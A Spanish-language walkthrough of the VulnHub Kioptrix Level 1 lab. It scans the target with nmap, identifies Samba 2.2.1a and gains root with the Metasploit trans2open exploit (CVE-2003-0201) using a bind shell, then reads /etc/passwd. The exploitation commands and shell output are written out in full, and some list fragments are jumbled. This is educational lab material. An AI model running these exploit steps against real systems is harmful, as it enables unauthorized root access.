
Writeup de Kioptrix Nivel 1 - CVE-2003-0201 Samba trans2open
Writeup de Kioptrix Level 1 - CVE-2003-0201 Samba trans2open
Autor: Amirbek Raxmatullayev (@americo_444)
Fecha: 2026-06-17
Plataforma: VulnHub
Dificultad: Principiante
Objetivo: Obtener acceso root
| Componente | Detalles |
|---|---|
| Sistema Operativo Anfitrión | Ubuntu 26.04 |
| Hipervisor | QEMU/KVM |
| Objetivo | Kioptrix Level 1 (VMDK) |
| IP del Atacante | 192.168.56.1 |
| IP del Objetivo | 192.168.56.101 |
Nota: VirtualBox era incompatible con el kernel 7.0.0-22-generic debido a un conflicto de espacio de nombres DKMS KVM. Se cambió a QEMU/KVM y se cargó el VMDK directamente sin conversión.
qemu-system-x86_64 \
-m 512 \
-drive file="Kioptix Level 1.vmdk",format=vmdk \
-netdev bridge,id=net0,br=virbr0 \
-device e1000,netdev=net0 \
-display gtk
nmap -sn 192.168.56.0/24
Resultado: Objetivo identificado en 192.168.56.101
nmap -sV -sC -p- 192.168.56.101
Puertos Abiertos:
msfconsole -q -x "use auxiliary/scanner/smb/smb_version; \
set RHOSTS 192.168.56.101; run; exit"
Resultado: Samba 2.2.1a — versión críticamente vulnerable confirmada.
Descripción:
Las versiones 2.2.x de Samba contienen una vulnerabilidad de desbordamiento de búfer basado en pila en la función trans2open. Esto permite que un atacante remoto no autenticado ejecute código arbitrario como root.
Versiones Afectadas: Samba 2.0.x — 2.2.8
Puntuación CVSS: 10.0 (Crítico)
Módulo de Explotación: exploit/linux/samba/trans2open
msfconsole
use exploit/linux/samba/trans2open
set RHOSTS 192.168.56.101
set LHOST 192.168.56.1
set PAYLOAD linux/x86/shell_bind_tcp
run
¿Por qué bind_tcp en lugar de reverse_tcp?
El payload reverse_tcp falló porque la VM Kioptrix no podía alcanzar de vuelta al atacante a través de la configuración NAT/puente. Con bind_tcp, el atacante se conecta al objetivo — no se requiere conexión saliente desde la víctima.
[*] Started bind TCP handler against 192.168.56.101:4444
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
...
[*] Command shell session 1 opened (192.168.56.1:36733 -> 192.168.56.101:4444)
¡Shell obtenido! ✅
whoami
# root
id
# uid=0(root) gid=0(root) groups=99(nobody)
hostname
# kioptrix.level1
uname -a
# Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
cat /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# john:x:500:500::/home/john:/bin/bash
# harold:x:501:501::/home/harold:/bin/bash
Información del Sistema:
[Attacker: 192.168.56.1]
|
| Step 1: nmap full port scan
v
[Target: 192.168.56.101]
|
| Step 2: Samba 2.2.1a identified
v
[Metasploit — trans2open exploit]
|
| Step 3: Stack buffer overflow triggered
v
[Bind shell opened on port 4444]
|
| Step 4: whoami = root
v
[TARGET PWNED]
nmap -sV -sCbind_tcp y reverse_tcp y cuándo usar cada uno| Herramienta | Propósito |
|---|---|
| nmap | Escaneo de puertos, detección de servicios/versiones |
| Metasploit Framework | Enumeración SMB, explotación |
| QEMU/KVM | Virtualización de laboratorio |
| arp-scan | Descubrimiento de hosts |
Escrito por Amirbek Raxmatullayev | BEK Coders Security Research | 2026
| Puerto | Servicio | Versión |
|---|
| 22/tcp | SSH | OpenSSH 2.9p2 |
| 80/tcp | HTTP | Apache 1.3.20 |
| 111/tcp | RPC | rpcbind 2 |
| 139/tcp | SMB | Samba 2.2.1a |
| 443/tcp | HTTPS | mod_ssl/2.8.4 |
| 32768/tcp | Status | RPC #100024 |